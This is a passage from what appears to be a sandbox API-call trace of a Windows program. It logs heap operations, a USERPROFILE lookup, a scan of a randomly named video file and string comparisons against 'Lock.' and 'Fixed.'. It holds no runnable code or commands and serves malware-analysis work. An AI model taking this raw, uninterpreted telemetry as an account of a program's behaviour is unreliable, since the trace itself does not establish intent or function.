cFileName="kmyLNxqbxySO-S_H2O9.mp4", cAlternateFileName="KMYLNX~1.MP4")) returned 0 [0212.729] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0212.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a749e8 | out: hHeap=0x2af0000) returned 1 [0212.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0212.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0212.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.730] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0212.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0212.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0212.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0212.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0212.730] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0212.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaff0 [0212.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0212.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0f8 [0212.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0212.730] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0212.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0212.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0212.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0212.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0212.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0212.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0212.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0212.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0212.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0212.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0212.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74df8 [0212.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0212.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0212.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0212.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0212.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0212.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0212.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0212.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0212.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0212.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0212.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0212.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0212.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0212.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0212.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0212.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5e) returned 0x2a74f30 [0212.732] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/kmyLNxqbxySO-S_H2O9.mp4", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\kmyLNxqbxySO-S_H2O9.mp4", lpFilePart=0x8cf650*="kmyLNxqbxySO-S_H2O9.mp4") returned 0x2e [0212.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74f30 | out: hHeap=0x2af0000) returned 1 [0212.732] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\kmyLNxqbxySO-S_H2O9.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kmylnxqbxyso-s_h2o9.mp4")) returned 0xffffffff [0212.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74df8 | out: hHeap=0x2af0000) returned 1 [0212.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0212.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0212.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.732] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0212.732] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.732] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0212.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0212.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0212.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0212.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0212.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0212.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0212.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0212.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0212.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0212.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PkICTcvFSPf3s9J", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kICTcvFSPf3s9J", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICTcvFSPf3s9J", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CTcvFSPf3s9J", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TcvFSPf3s9J", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cvFSPf3s9J", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vFSPf3s9J", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FSPf3s9J", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SPf3s9J", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pf3s9J", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0212.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f3s9J", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0212.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0212.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0212.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0212.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0212.734] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0212.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0212.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0212.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0212.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0212.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0212.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0212.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0212.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0212.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0212.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0212.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0212.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0212.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PkICTcvFSPf3s9J", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kICTcvFSPf3s9J", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICTcvFSPf3s9J", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CTcvFSPf3s9J", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0212.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TcvFSPf3s9J", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cvFSPf3s9J", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0212.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vFSPf3s9J", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FSPf3s9J", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SPf3s9J", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pf3s9J", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0212.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0212.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0212.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0212.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0212.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0212.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0212.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0212.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0212.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6290 | out: hHeap=0x2af0000) returned 1 [0212.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0212.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0212.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0212.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0212.735] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0212.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0212.736] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0212.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0212.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0212.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0212.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722f8 [0212.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0212.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0212.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0212.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0212.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0212.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0212.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0212.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0212.736] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0c8 [0212.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaafd8 [0212.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0212.736] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0212.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0212.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0212.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0212.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0212.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0212.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0212.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0212.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0212.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0212.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0212.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74f98 [0212.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0212.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0212.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0212.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0212.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0212.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0212.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0212.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72318 [0212.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0212.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0212.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0212.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 